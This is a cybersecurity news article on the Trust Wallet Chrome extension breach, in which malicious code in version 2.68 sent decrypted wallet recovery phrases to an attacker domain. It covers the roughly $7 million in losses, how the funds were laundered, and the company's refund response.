Malicious Code Caused $7 Million Crypto Loss by Trust Wallet Chrome Extension Breach
“A Chrome Extension Breach in Trust Wallet Caused $7 Million Crypto Loss through malicious code.”
After what it called a “security incident” that resulted in the loss of about $7 million, Trust Wallet is advising customers to update their Google Chrome extension to the most recent version.
The multi-chain, non-custodial cryptocurrency wallet service stated that version 2.68 is affected by the problem.
Chrome Web Store Listing
| There are roughly a million users of the addon. It is recommended that users update to version 2.69 as soon as they can. |
Trust Wallet, X
| “We will make sure that all impacted users receive a refund. We have verified that about $7 million has been impacted.”
“Our primary goal is to assist impacted users, and we are aggressively completing the procedure to reimburse them.” |
Additionally, Trust Wallet is advising users not to respond to any messages that do not originate from its official channels. All other browser extension versions and people who solely use mobile
devices are unaffected.
SlowMist
| Malicious code was included in version 2.68 with the intention of iterating through all wallets kept in the extension and requesting a mnemonic phrase for each wallet.
“The password or passkeyPassword entered during wallet unlock is then used to decipher the encrypted mnemonic.” “The attacker’s service, api. metrics-trustwallet[.]com, receives the mnemonic phrase after it has been decrypted.” “Instead of an inserted compromised third-party dependency (such as a malicious npm package), this backdoor event resulted from malicious source code alteration within the internal Trust Wallet extension codebase (analytics logic).” “After directly altering the application’s code, the attacker used the authentic PostHog analytics package as a data-exfiltration channel, rerouting analytic traffic to a server under their control.” It might be the action of a nation-state actor, and the attackers might have acquired deployment authorization before December 8, 2025, or taken control of developer devices connected to Trust Wallet. |
The first request to “api.metrics-trustwallet[.]com” began on December 21, 2025, following the registration of the domain “metrics-trustwallet[.]com” on December 8, 2025.
Subsequent investigation has shown that the attacker has harvested wallet user data using posthog-js, an open-source full-chain analytics tool.
Approximately $3 million in Bitcoin, $431 in Solana, and more than $3 million in Ethereum are among the digital assets depleted thus far. Cross-chain bridges and centralized exchanges have been used to transfer and launder the pilfered money.
ZachXBT, a blockchain investigator, published an update stating that hundreds of people have been affected by the incident.
PeckShield
| “The majority of the stolen monies—>$4 million in cryptocurrency—have been transferred to CEXs [centralized exchanges]: ~$3.3 million to ChangeNOW, ~$340,000 to FixedFloat, and ~$447,000 to KuCoin. However, ~$2.8 million of the funds are still in the hacker’s wallets (Bitcoin, EVM, and Solana).” |
Although no additional proof was offered to back up the theory, Changpeng Zhao, a co-founder of the cryptocurrency exchange Binance, which owns the utility, implied that the exploit was “most likely” executed by an insider.
About The Author
Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”
Read More:
Cyberattack Hit France’s Postal Service: Claimed By Pro-Russian Hackers
About Author
English